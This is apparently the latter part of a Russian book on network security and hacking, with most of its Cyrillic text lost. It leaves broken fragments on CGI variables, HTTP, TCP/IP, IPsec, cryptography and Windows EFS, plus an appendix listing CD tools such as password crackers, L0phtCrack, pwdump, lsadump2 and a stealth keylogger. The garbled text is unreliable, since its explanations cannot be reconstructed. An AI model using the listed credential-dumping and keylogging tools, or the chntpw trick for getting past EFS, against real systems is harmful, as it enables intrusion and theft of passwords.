</HTML>

POST ( FORM METHOD "post")
- 42 ,
:
postal-address=ivan@email.com&subscribe=on
CONTENT_LENGTH
42, CONTENT_TYPE
"application/x-www-form-urlencoded".
"",
.

.
(,
).

\ cmpoku
.
URL,
. (
URL , ).
.
,
, .



/
.
, ,
,
.
, ,
, ,
. ,
/
. - URL - ,
URL
.
.
,
URL ( ,
).

http://www.anysite.com/prog/addsubs/text/template/?name1=value1&name2=value2

.
/.../addsubs /text/template/ name1=value1 name2=value2

/ . . . / (.. )
-. ,
/text/template/. ,
- , (,
- ).
URL .
/prog/addsubs?name1=value1&name2=value2

.
/.../addsubs ' ' name1=value1 name2=value2

(
,
CGI, .


SERVER_SOFTWARE - ,
. : /.
, : /1.1.
SERVER_NAME - Web-, DNS-,
IP- (
URL).
URL .
: www.anyserver.com
GATEWAY_INTERFACE - CGI, , . : CGI/.
: CGI/1.1.

CGI- .
CGI.
SERVER_PROTOCOL - , . : /.
, : /1.1
SERVER_PORT - , , , 80.
REQUEST_METHOD - , . HTTP 1.1 .
PATH_INFO - ,
URL . ,
URL http://www.anysite.com/prog/handler.exe/text/dot,
handler.exe, PATH_INFO
"text/dot". ,
,
. PATH_INFO.
PATH_TRANSLATED -
-,
URL . ,
Web-
/usr/local/etc/httpd/htdocs. , cgi-bin
, ..
:
http://www.anyserver.com/cgi-bin. URL
http://www.anyserver.com/cgi-bin/handler
PATH_TRANSLATED: /usr/local/etc/httpd/htdocs//cgi-bin/handler ..

,
.
SCRIPT_NAME - ,
.
URL ( , ,
HTML,
).
: /cgi-bin/handler.exe
QUERY_STRING - , "?" URL,
HTTP- .
.

. ,
URL

:
http://www.anysite.com/handler?postal-address=ivan@email.com&subscribe=on QUERY_STRING
: postal-address=ivan@email.com&subscribe=on.
REMOTE_HOST - , .
,
REMOTE_ADDR, .
REMOTE_ADDR - IP- ,
. : 199.23.155.34.
AUTH_TYPE -
,
.
HTTP 1.1
RFC2616.
HTTP (, "challenge"), NULL.
REMOTE_USER - ,
( ) .
REMOTE_IDENT - HTTP- RFC931,
, . , .
CONTENT_TYPE - ,
, POST PUT HTTP, MIME- , , "application/x-www-form-urlencoded".

CONTENT_LENGTH - , .
, POST, ,
.
HTTP_ACCEPT - (MIME-),
.
.
HTTP.
: /, /... : image/gif,
image/x-xbitmap,image/jpeg
HTTP_USER_AGENT - , .
: / /.
: Netscape/4.6 (Win2000)



STDOUT,
.
HTML, ,
, ,
HTML.
,
, .
, HTTP .
, CGI ,
nph-.
.
, : , , , .

,
CGI
,
.
,
, HTTP, ,
CRLF. , , . CGI
.
Content-type - .


Location - ,
, , . URL,
.
, ,
.
Status - HTTP
, . : NNN
, NNN - , , , , : Forbidden
().
. ,
-,
HTML. , .

Content-type: text/html

,
, ,
.
#include <stdio.h>

int main(int argc, char *argv[])
{
    /* Header line, then the empty line that ends the header block */
    printf("Content-Type: text/html\n\n");
    printf("<HTML>\n");
    printf("<TITLE> </TITLE>\n");
    printf("<BODY>\n");
    printf("<H1> !</H1>\n");
    printf("</BODY></HTML>\n");
    return(0);
}


HTML, printf ()
. HTTP, .
,
anydoc.txt, /text/
. ,

http://www.anyserver.com/text/anydoc.txt. ,
.


.

Location: /text/anydoc.txt

, , FTP, ,
: ftp://ftp.cso.uiuc.edu. .

Location: ftp://ftp.cso.uiuc.edu
---
, , -
,
, .

,
, , , . , nph- HTTP. , SERVER_PROTOCOL "HTTP/1.1",
HTTP 1.1.

HTTP/1.1 200 OK
Server: CERN/3.0 libwww/2.17
Content-type: text/plain

HTTP

, Web,
HTML, .
Web HTTP (Hypertext Transfer
Protocol - ). HTTP

.
HTTP 1.1 ( RFC 2616,
http://www.ietf.org/rfc/rfc2616.txt)
HTTP 1.2.
, HTTP 1.1.

cmpykmypa HTTP
Web
. Web,
, -
. HTTP
, () (,
).
, ,
. , ,
. ()
RFC 822. HTTP 1.1 ,
, (CR)
(LF) - CRLF, .

{__1 CRLF __2 CRLF ...)
CRLF
[ ]


.
,
, HTTP.
,
, .
; ,
200 , 402 , ..


, , ,
(, HTML).
,
. ( ,
) ,
(:).
=__ " : "

[ ]

,
, ,
.
,
, , , .

, , ,
.
, , ,
, (
), .
, .

HTTP, ,
,
HTML, .. .
(. .1).
.1. HTTP 1.1

Allow
,
, : Allow: GET, HEAD, PUT

Content-Encoding
, . , Content-Type, :
Content-Encoding: gzip
( gzip)

Content-Language
, :
Content-Language: da
( )

Content-Length
, :
Content-Length: 35645

Content-Location
/ URL , , Web.
URL .

Content-MD5
(.. ,
) ,
RFC 1864.

Content-Range
, .

Content-Type
,
. :

Content-Type:Type"/"Subtype [__1 "="


_1;...]
- , a Subtype - ;
, . , :
Content-Type: text/html; charset=ISO-8859-4
, HTML, ISO-8859-4. IANA (Internet Assigned Numbers
Authority - ).
Expires

,
, :
Expires: Sat, 04 Dec 1999 16:00:00 GMT

Last-Modified

, : Last-Modified: Tue, 17 Dec 2001 11:40:26 GMT


. .1
,
(
HTML). , HTML, HTTP,
HTML.

HTTP
HTTP ,
(. ), .
, .
Request-Line = Method SP Request-URI SP HTTP-Version CRLF

SP - ASCII ( 32), -
HTTP, ,
URL, a CRLF - (CR) (LF).
HTTP . .2.
. 2. HTTP

OPTIONS

,
.

GET

, , URL .

.

HEAD

GET ,
; HTTP .

POST

,
,
, URL
.

PUT

,
URL.


DELETE

, ,
URL .

TRACE


,
.

CONNECT

HTTP 1.1 ,
-.

, HTTP 1.1.

HTML 4 HTTP,
, METHOD FORM. HTML 4, W3C,
,
.
METHOD - "get" "post". .
METHOD "get",
ACTION HTTP,
ACTION, "?", ,
"application/x-www-form-urlencoded". GET
HTTP, URL .
GET ASCII.
METHOD "post", ACTION
HTTP, POST
HTTP ACTION ,
,
ENCTYPE.

ACTION METHOD
HTML 4 . GET POST HTTP
.
. .2, GET , , -
, .. , .
,
Web,
GET.


, , ,
, POST.
GET
ASCII. POST
ENCTYPE, "multipart/form-data",
, ISO10646.

D.

TCP/IP
- . , ,
.
Windows 2000/XP .
,
.
,
, .

, . ,
(ISO - International Standards Organization),
. OSI (Open
System Interconnection - ).
OSI
. IPSec (Internet
Protocol Security - ), ,
, (
, - Microsoft).

OSI
ISO, ,
OSI,
. OSI :
.
.

.
.

.

.
- - :
. - - :
,
. .


,
.
, 0 () 1 () ,
. , (10BaseT, 100BaseT) (10Base2)
, .


,'.. ,
( ).

.
( ) .
Ethernet
Token Ring, .
OSI
.
.
. , 802 ( ), :
LLC (Logical Link Control -- ),
() .
MAC (Media Access Control - ),
CSMA/CD (Carrier Sense Multiple Access with Collision Detection ).
CSMA/CD Ethernet, (, ARCnet), Token Ring.



,
. ,
,
.
,
, .

. ,
.

.
, , -
.


.
.

.
.

NetBEUI, TCP/IP . ,
.



, .

.

.
, ,
NetBIOS Windows Sockets - TCP/IP.
Windows 2000 32- Windows Sockets
(Winsock) . ,
Winsock.



,
, ,
(, ASCII EBCDIC IBM ). ,

.
-
(XDR -- External Data Representation),
(RPC - Remote Procedure Call).
RPC - , ,
, ,

. ,
,
. RPC
/.

bag
,
, ,
. ,
.
.
- RPC.

OSI
, OSI - - .
, ,
.
,
. , 0 1 . -,
, , , .. ,

(1 0), .

,


. . , , ,
,
, .. -,
. ,
, ,
- ,
.
, ,
.
, ,
, , .
, ,
, .. ,
, -
. , , , ;
, .. 1 0.
,
.
, , , .
-
, .
,
,
- , .

, , .
,
-
. -
, , , ,
, .
,
- ,
.

IP-agpeca u
TCP/IP .
.


,
.
, -.
. , . - ,
;
.
TCP/IP -
, .
, , - .
.
Windows NT/2000/XP :
, . Ethernet
- (Media Access Control -
), .
, 6 ,
-. , , ,
. -
12 , , 00 03 12 5D 4.
(, ATM Token
Ring) .
IP-
TCP/IP. , ,
IP-. , , ,
. ,
IP- ,
,
, InterNIC (http://www.internic.net.). IP-
, .
1 254 ( 0 255 ),
, 123.45.67.89 - -. .

.
(. IP- ).
TCP/IP
. ,
(Fully Qualified Domain Name - FQDN).
, webserver
webserver.company.com.


, TCP/IP.

. Windows FQDN
NetBIOS (. ).
.
(, company.com)

.
FQDN, a
.
NetBIOS Windows,
net use net view. Windows
(Network Neighborhood), NetBIOS Microsoft.
15 .

.

The TCP/IP protocol

TCP/IP (Transmission Control
Protocol/Internet Protocol - / ), .
,
.
/ ,
NetBEUI, IBM
Microsoft, TCP/IP - . TCP/IP Internet (Internet Engineering Task Force IETF), (RFC - Request for Comments).
TCP/IP
,
. TCP/IP ,
, TCP/IP, ,
, Windows 2000, . TCP/IP , , , , , , .


, TCP/IP ,
IP-, IP.
TCP/IP - . ,
. , ,
, ,
. TCP/IP
IP-.

IP addresses
TCP/IP IP-,
.
, , ,
, .
, ,
.
IP- 32- ,
- ; IP-
,
0 255. , .. ,
, , 204.209.43.2.
- ,
, -
. ,
1 0, IP-
.
IP- , ,
, , D .
.
IP- 0. 7
. 24 , , .
, 126 , 16 777 214
.
.
10.


14 . 16 (..
) . ,
16 384 , 65 534 .
. -
110. 21
, 8
. , 2 097 152
, 254 .
D IP- .
- D
1110, ,
.

1111 .

. ,
50 , , , , .
128 - 191,
191 - 223. 223
. IP-,
.
- . , ,
, , ,
IP-,
, .
.
- ,
.
, ,
. ,
,
. - 32-
, IP-
. : ,
, 1, ,
, 0.
-
AND - . AND
: 1, 1;


0.
IP- 130.57.190.42 255.255.248.0.

10000010 00111001 10111110 00101010
11111111 11111111 11111000 00000000
10000010 00111001 10111000 00000000

- 130.57.184.0.

. IP-
.
Windows NT/2000/XP
(DHCP - Dynamic Host Configuration
Protocol), -
. /

.

TCP/IP
, TCP/IP ,
. . .
, , OSI.
, OSI.
, OSI.
,
OSI.

TCP/IP ,
Windows 2000.


/

/. ,


TCP/IP, ,
. ,
- TCP/IP.
:
HTTP (Hypertext Transfer Protocol - ) Web-.
FTP (File Transfer Protocol - ) -
Web.
SMTP (Simple Mail Transfer Protocol - ) .
Telnet - ,
.
DNS (Domain Name System - ) -
IP-.
RIP (Routing Information Protocol - ) .
SNMP (Simple Network Management Protocol -
) -
.
TCP/IP Windows 2000
: Windows Sockets ( Windows),
Winsock, NetBT (NetBIOS TCP/IP).
.

CpegcmBa Winsock
Winsock (
Winsock) ,
.
, .
TCP/IP,
,
.
Winsock
: ,
TCP, ,
UDP (User Datagram
Protocol - ).


Winsock (Application
Programming Interface - API), .
,
, ,
. ,
Winsock :
1.
Winsock .
, , , Winsock ,
IP- ,
.
2.

, ,
, IP- , Winsock
. , .
1024.

3. Winsock
( ) .
4.

Winsock
OSI,
.

5. -
TCP/IP , .
Winsock ( -
) -.
6.

,
. Windows NetBT ' ,
,
.

NetBT
NetBT (NetBIOS TCP/IP) NetBIOS (Network Basic Input Output System - ) TCP/IP. NetBIOS
Windows :


.
, NetBIOS, . NetBIOS , .
. NetBIOS
, , ,
.
.
, .
NetBIOS
NetBEUI (NetBIOS Extended User Interface - NetBIOS). TCP/IP
NetBIOS TCP UDP. , TCP NetBIOS. TCP/IP
NetBIOS,
Windows. Microsoft
NetBIOS TCP/IP NetBT.
NetBT
NetBIOS 137, 138 139. ,
NetBIOS, , Compl,
NetBT
137. , NetBIOS, , Compl 137. ,
,
.
, NetBIOS,
NetBT, NetBT
TDI (Transport Driver Interface -
). TDI
NetBT (.. NetBIOS) . Winsock TDI.
,
Winsock IP- .
TCP/IP ,
. OSI
,
IP-.
.



TCP/IP
, . ,
- Web-,
HTTP (. RFC 2616).
HTTP ,
, . .
, http://www.microsoft.com ,
www.microsoft.com,
HTTP.
, (, Web-)
OSI,
(, ),
. Winsock
, API (Application Programming Interface ).
, (..
) -,
Winsock .
Winsock NetBT .
.

Winsock
IP- Winsock
.
> API Winsock
HOSTS. HOSTS
IP-,
.
> HOSTS , Winsock
DNS (Domain Name Service - ).
> , API
NetBIOS.
HOSTS .
, IP- HOSTS
. HOSTS
\\__\132\15\1
.


DNS
IP-, DNS. Winsock
DNS
IP-. DNS :
.
IP-.
DNS
.

; DNS DNS,
, ,
.
IP- ,
DNS .
, ,
, IP-
IP- - IP- DNS
.
TCP/IP Windows 95/98/NT/2000/XP
DNS DHCP (Dynamic Host
Configuration Protocol - ).
DHCP IP- DHCP.
DHCP , DHCP IP-. DHCP
IP-, , TCP/IP.
Windows 2000
DNS. Windows 2000 Professional
DNS IP-,
DNS.
TTL (Time to Live - ), ,
. , , Windows 2000 Professional,
DNS, .

NetBIOS
NetBIOS 16 , 15
,
,
. NetBT
, NetBIOS -


IP-. () NetBIOS IP-


NetBT .
NetBIOS. NetBIOS -,
- .
,
NetBIOS .
WINS (Windows Internet Naming Service -
Windows). WINS Windows 2000
Server , WINS
-. WINS
Windows.
. WINS
NetBIOS IP-, NetBT -

IP-.
LMHOSTS. HOSTS
, IP-
NetBIOS.
#PRE, NetBIOS -
NetBIOS. LMHOSTS
\\_\5132\15\1 .SAM.
HOSTS. NetBT NetBIOS
HOSTS. HOSTS, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\NetBT\Parameters EnableDns.
DNS.
EnableDns ( ), NetBT
NetBIOS DNS.

TCP/IP.


TCP/IP .
,
.
,
(TCP UDP), IP-
.


TCP .
TCP/IP
TCP, UDP, .

TCP
TCP (Transmission Control Protocol - )
.
. TCP
, ,
. , , ,
.
TCP
() . TCP.
- .
- -.
- TCP.
TCP , TCP.
- ,
.
. -,
. FIN,
, .
- ,
. TCP .
. ,
.
.
, - -
.
, TCP
.
. .


1.

- TCP,
TCP
.

2.

- TCP,
, TCP
TCP .

3. - TCP,
-.
TCP
. , - TCP
-,
. Windows
TCP 64 . Windows 2000
TCP 1 ,
TCP.
TCP SYN. ,
.
D.1. TCP.
D.1. TCP

TCP-
20    FTP
21    FTP
23    Telnet
80    Web- HTTP
139   NetBIOS

UDP
(UDP
User Datagram Protocol)
,
( ).
UDP .
UDP TCP;
, .


UDP ,
. UDP
, , NetBIOS NetBIOS
SNMP.
D.2 UDP-.
D.2. UDP
UDP-
53    DNS
137   NetBIOS
138   NetBIOS
161   SNMP

Me>kcemeBou

TCP/IP.
,
.
.
IP (Internet Protocol - ) - IP-
,
.
ARP (Address Resolution Protocol - )
.
ICMP (Internet Control Message Protocol -
) - IP-. ICMP
ping tracert, W2RK.
IGMP (Internet Group Management Protocol -
) .
, ,
IGMP.
.


IP
IP
TCP/IP. IP- ,
, -.
IP- .

IP- . IP- - IP-.

IP- . IP- - -.
.
, , - .
(TTL). .

, IP-
.
. ,
IP- - TCP, UDP, ICMP .
. -.
IP
- ,
.
, ,
.
IP-
IP-
-. TTL ,
IP- . PJP, 30

. , .

ICMP

. ICMP -
-. ICMP
, - IP-
()
.


IGMP
,
.
, IGMP. IGMP , ,
, .
1 - ,
2 - , . TCP/IP Windows 2000 Windows NT 3.51. , IGMP,
NetShow.

ARP

.
MAC (Media Access Control -
). MAC ( -) - 48- ,
. - MAC , ,
TCP/IP.
-,
, NetBIOS - -.
ARP (Address Resolution Protocol - ), RFC 826.
ARP TCP/IP. .
ARP IP- .
1. ARP,
IP- -.
2.

ARP ,
ARP. -
, IP- , - . ARP ,
.

3.

ARP -
, . ,
. , ARP,
, -, .
-
ARP.

4.

.
-
ARP. .

, -
. , -
. , IP
, - - .


( )
TCP/IP / . TCP/IP
Ethernet, Token Ring, X.25 Frame Relay.
,
.
-
Windows 2000 NDIS (Network Driver Interface Specification ) 5 (NDIS 5.0).

Active Directory
TCP/IP Windows 2000
, ,
,
.. Windows 2000
AD (Active Directory),
, Windows NT.
AD ,
, , OU
(Organizational Unit).

DNS ( OSI
, ).
, DNS, .
, - .
, .
, , .
, ,


. ,
.
Windows NT 4,
,
.

, .
, , , . , .
.
Windows NT .
Windows 2000 :
, ,
, .
: ,
.
, Windows NT. ,
Windows 2000 .
-
, - ,
- . AD Active Directory Users
and Computers (Active Directory - ), Security
Configuration and Analysis ( ) ,
Windows 2000/XP.
AD Windows 2000/XP
LDAP (Lightweight Directory Access Protocol ) LDAP AD, , . ,
LDAP [3].
AD [6]
AD,
AD.
, Windows 2000/XP - IP-.


1-
TCP/IP , , , , , . ,
, - ,
.
/.
.
.
,
.
( , sniffing - ).
. , ,
,
, .
IP-. TCP/IP IP, IP- (. ), ,
, . IP- , , ,
, .
. -
. ,
,
, .
- .
, , -
, , -
SAM .
DoS (Denial of Service - ).
, .
, .
,
,
, .
. , -


. .
/
.
.
, . ,
(, pcAnywhere). ,
- , , ,
.
IP-,
IPsec (Internet Protocol Security

),
IP- . IPsec , TCP/IP, TCP/IP
. ,
IPsec.

IPsec
IPsec , ,
. ,
IPsec , IPsec , , .
, IPsec
-

.
IPsec ,
, , - , ,
. , . , , ,
(, LC4)
.
,
,
,


. IPsec , - .
, (
), - IPsec
.
IPsec ,
. IPsec .
. IPsec
,
.
, (PKI), - .
,
DES 3DES.
(Hash Message Authentication
Codes). -
, .
.
MD5 SHA.

.
IPsec IP, IPsec
. IPsec ,
, .
IPsec ,
. IP- ,
.
IP-, Windows 2000/XP
(, [6]).

- (, , ),
.
: , , ,
, , . ? ( )
, .
, (.. ) , , , .
, .


, ,
, . ,
, , .. ,
, .
,
- . , .
- , . - ,
( ).
( - ).
, .
, :
()=


D , .
D(C)=0



, D - . , 3 . - , , . ,
.
, (), . , , , , , ?
. .
.
, - .
. ,
, -
.
.
.
.


, ,
, . , , , .
. -, .
- , - , ,

. , /. .


, , ,
, .
, .
: , / ; ,
.
, /
, . ( ) ,
( )
. - .

; .
(0)=
DK(C)=0

,
.. ()
(2). .
1(0)=
DK2(C)=0

,
- .
-
, .
;
-
. ,
,
.
: .



,
. ,
.

. , , , , ( ,)
. , , ; .
.
(0)=
D K (C)=0

, , / .
, . , . / - , (
), , , . ( ) ( ). 64 .


( )
,
:
. , .. ( ).
, ,
, ,
, . , ,
.


(0)=
D K (C)=0

, , .
- , ,
. .
, . , , '= () N , ' ,
, .. '=.
, - , '. N , . , ,
. .


,
(, , - ). - ,
.
-
, .
, ,
, .
, ,
, ,
. , !
, , .
.
. , ,
.
.
, , .


.
, - .
. ,
,
, .
.

, . .
. ,
.
.
, , , .
.
. , .
, .
, .
, .
,
. ,
2128 ( ), , ,
1019, .
.
- , , . , , , ,
, .
, , .


, , , ,
.
. ,
,
, ,
.

1
,
,
. ,
. , - , . ,
.
, , , , . , . ,

,
.
, . -1
-2 , .
, , , , , , , . .



-1 -2
, . .
1. -1
.
2.
3.
4.
5.

-2

-1 -2 .
-1
.
-1 -2.
-2
.

, , , ( 4 ).
, ,
, ,
, ,
. ( ), ,
.
?
-

, , , .
, , , .
.
, , ,
. -1, -2 .
, ,
. , .
, :


.
,

.
, .


- . , ,
,
.
.
1. -1 -2
.
2.
3.

-1 -2 .
-2 -1
-1.

4. -1
-2.
, , , PGP Desktop Security.
.
1.

-1 -2 .

2.

-1 ,
-2, -2.

3.

-2 -1.

, ,
() , ,
, ,
, .

,
,
, -
.
, .

kpunmocucmeMbi

,
, .
.

.
1.

-2 -1 .

2.

-1 , -2 -2.
.
2 ()

3.

, -2 -1 .
D2(E2(K))=K

4.

, .

5. .

. , ,
,
- .


, .
, . .

. 2,
.


1.

-1 -2
.

2.

3.

, -1, 2.

4.

-2.

5.

-2 2
-1 .

-1 ,
-1 . ,
, . , :
, .
,
.
.
. , , -2
(.. ), ,
.
. . -2, ,
-1,
,
, -1.
. -1 , , .
- , , , ( ).
.
. , .

( , , ),


. , (, ),
, .

,
, , ,
. ,
, . - , ,
-. , , .

-!<1
, ,
, .. , F(x)
,
F ( x ) .
. , , , .'
, ( ).

. , ,
-
.
,
F ( X ) , F(x)
, z.

.
-, (), , h ' , .. :
h=H(M)
h, , , .
,
, - -


, , , .
, h.
h, , () =h.
, , ', () =('),.
. -1 ()
. ? , , ', , , .. ()=('),
.
-, , , , ,
. ,
-1 ,
-2 , -1
,
.
.


, , ,
, - . :
S K (M)

:
V K (M)

, ,
, . ,
.
,
, .
.

1.

.
-1 .
S1(M)

2.

-1
-2 -2.
E2(S1(M))

3. -2 .
D2(E2(S1(M)))=S1(M)

4.

-2 ,
-1, .

Vi(Si(K))"VL
. -,

/ ; -1 , . -,
. ,

. -, .
,
, .

(
2002 ).

.
(PKI - Public Key Infrastructure).


, PKI,
- , .
-1 -2,
-2. -2
, , , .
.
, -1 -2.


-2 ?
,
, .
-2 -1 , .
, ,
-2 . , , .
.

Cepmucfukambi omkpbimbix
, . ,
, , - , . , , ( - Certification Authority). , , , , ,
.
.
PKI .
, , ,
. , , , - . -
, , :
, ,
.
.
. ,
- ,
. , -
.
.


, ,
.

, .
,
.
Windows 2000 Server Advanced Server PKI .
, Windows NT

Web-. Windows 2000 Professional , Web, .
Windows 2000 Professional
X.509v3 ( 3), ITU-T (International Telecommunications Union - ) . X.509v3 - , ,
, . Windows 2000
, ,
. Windows 2000 , (Certificates) .


PKI, , , PKI,
. , ;
. ,
, , ,
, , .
, , - , , , . -- ,
. - ; , . ,


, , , PKI ,
.
PGP Desktop Security,
( ).
PGP
, . .
, Windows 2000/XP ,
, NTFS,
, Windows 2000.
Windows 2000 ,
.

Windows 2000
Windows 2000 - Professional, Server Advanced Server -
EFS (Encrypted File System). EFS
, NTFS ( FAT). DESX 56-
.
;
Windows 2000 , DDF (Data Decipher Field - ). DDF Windows 2000, .
,
, ,
.
Windows 2000 Professional .
- , () .. EFS .
Windows 2000
, (
, ).
, EFS? DESX DES (Data Encryption Standard -
), , , -


, , 2000
AES (Advanced Encryption Standard - ). , 56- , (, ).
Windows 128- , Microsoft Enhanced CryptoPAK.
Microsoft (My Documents) /Temp , .
, (, MS Office
..).
Microsoft EFS
, . [3]
,
chntpw.exe. ,
(
Linux),
, SAM,
SYSKEY.
, [3] Windows
2000 SAM , , Windows 2000 , NTFSDOS Pro
(http://www.sysinternals.com),
NTFS. , ,

, .
, chntpw.exe , . , EFS
- , , ,
, .
, Microsoft EFS,
.
Windows ,
Windows
.

F. kojuinakm-gucka

""

95sscrk.zip


Win95 Screensaver
password cracker


Windows 95/98

2 acpr.zip

Advanced Access
Password Recovery


Microsoft Access
95/97/2000

www.elcomsoft.com

3 ae2000pr.zip

Advanced Excel 2000


Password Recovery


Microsoft Excel 2000

www.elcomsoft.com

4 aimpr.zip

Advanced Instant
Messengers Password
Recovery


- ICQ, AOL IM,
Yahoo! Messenger, MSN Messenger .

www.elcomsoft.com

5 amipswd.rar

AMI BIOS password


decipherer

BIOS

6 Antexp.zip

Advanced NT Security
Explorer


Windows NT/2000/XP.

7 AntiSniff

AntiSniff

8 aoepr.zip

Advanced Outlook
Express Password
Recovery

www.elcomsoft.com

9 aopb.zip

Advanced Office
Password Breaker



Word Excel 97/2000

www.elcomsoft.com

www.elcomsoft.com/

10 aoxppr_p.zip

Advanced Office XP
Password Recovery


Word, Excel, Access, Outlook, Project, Money,
PowerPoint, Visio, Publisher, Backup,
Schedule*, Mail

www.elcomsoft.com

11 aoxppr_s.zip

Advanced Office XP
Password Recovery



Word, Excel, Access

www.elcomsoft.com

12 aw2000pr.zip

Advanced Word 2000


Password Recovery


Word 97/2000

www.elcomsoft.com

13 azpr.zip

Advanced ZIP Password


Recovery
ZIP/PKZip/WinZip

www.elcomsoft.com

14 brutus-aet2.zip

Brutus-AET2

www.hoobie.net/brutus

15 CGIScan.zip

CGI Vulnerability Scan

Web-

www.wangproducts.co.uk

16 Cgiscan3.zip

CGI Exploit Scanner v 3.


Web-

Linux,

Windows,

17 chntpw

chntpw

18 Cleaner3.exe

The Cleaner 3.5

www.moosoft.com

19 Clndisk.exe

Clean Disk Security

www.nai.com

20 CyberCop_Scanner_ CyberCop Scanner 5.5


CSCI550E.zip

21 dcs21.zip

D@mned CGI Scanner

CGI-

22 els004.zip

ELSave

23 Foundstone Tools


Foundstone


: , ,
.

24 grabitall.zip

GrabItAll

www.ntsecurity.nu

25 Hping


Hping


(.. ) ICMP,

www.hping.org

26 hunt


Hunt

TCP-

27 ICQ Groupware

ICQ

ICQ

www.icq.com

ICQ submachine-

ICQ

http://uinhunters.net

28 icqsmg14.zip

www.foundstone.com

Gun v1.4.

29 iks2k21d.exe

Invisible KeyLogger
Stealth

www.keylogger.com

30 kerio-wrp-425-ruwin.exe

WinRoute Pro 4

www.kerio.com

31 kitd.exe

Passware Kit 5.7


, ICQ,
, , Window

www.lostpassword.com

32 lc4setup.exe

L0phtCrack (LC4)

SAM
(Security Account Manager)

33 legion.zip

Legion v 1 .2.

packetstormsecurity.org/
groups/rhino9

34 legionv21.zip

Legion v2.1.

packetstormsecurity.org/
groups/rhino9

35 Lib

,

-

www.microsoft.com

36 lsadump2.zip

lsadump2


Windows,
Windows

www.webspan.net/~tas/
lsadump2

37 nc11nt.zip

Netcat 1.10 for NT


Web- IIS

38 Nmap


Nmap

,
,
ACL

www.insecure.org/nmap


NTFS MS-DOS

www.winternals.com
www.agnitum.com

39 NTFSDOS Pro 4.0.zip NTFSDOS Pro

www.atstake.com

40 OutpostProInstall-2-0.exe

Agnitum OutpostFirewall
Pro v 2.0

41 PGP

PGP Desktop
Security 7.0.3

www.pgp.com

42 pro12.exe

TeleportPro v 1.2.

www.tenmax.com


43 PS4Demo.exe

PhoneSweep


,
,
,

www.sandstorm.net

44 PwDump

'
PwDump

www.ebiz-tech.com

45 pwltool.zip

PWL&NetTools v 6.80


Windows 9x/Me

46 retina4943demo.exe Retina - Network


Security Scanner


Web-

47 RevelationV2.zip

Revelation v 2 .0

,
*****

www.snadboy.com

48 samdump.zip

SAMDump


SAM

49 showin.zip

ShoWin v 2.0

www.foundstone.com

50 slpro_20.exe

ScreenLock

www.screenlock.com

www.solarwinds.net

51 SolarWinds2002-PP- SolarWinds Professional 37


Eval.exe
Plus

www.eeye.com


52 spynet.zip

SpyNet v0.1

53 spynet312.exe

SpyNet v3.12

54 superscan121.exe

SuperScan v 1.21

55 tcpdump


tcpdump

www.tcpdump.org

56 tftpd32m.zip

Tftpd32 ,

www.superscan.net

tftp32.jounin.net

TFTP-, -,
DHCP- syslog-

57 Tripwire

Tripwire

www.tripwiresecurity.com

58 wgsetup.exe

WinGate v 5.0.7

www.wingate.com

59 ZZ.exe

Zombie Zapper

razor.bindview.com/tools/
ZombieZapper_form.shtml

Cnucok
1. 2000-2003 .
2. .. - .: -, 2001. - 624 .: .
3. - ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .
4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5. . .
. - 560 . - .: ,
2002.- ( ).
6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.

Alex JeDaev . - .:
, 2002 - 432 .: .

8. . . (+CD). .:, 2002. - 864 .: .


9. .. .: . . - .: +, .:
, .: -, 2001.- 272 .
10. . .
-.: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .



U
U AHTUXAKUHC:
U

( , , , - 3000)
: (095) 720-07-65 (). E-mail: opt@triumph.ru
-: www.3st.ru
-: 125438, ., / 18 . E-mail: post@triumph.ru
:
-
-
-

, , - Alex WebKnacKer.
.. .
.. .
.. .
. 125438, ., / 18.
00033 10.08.99 .
- 25.10.03 .
70x100/16. . . . 25.
1687.
4000 .


143200, . , . , 93
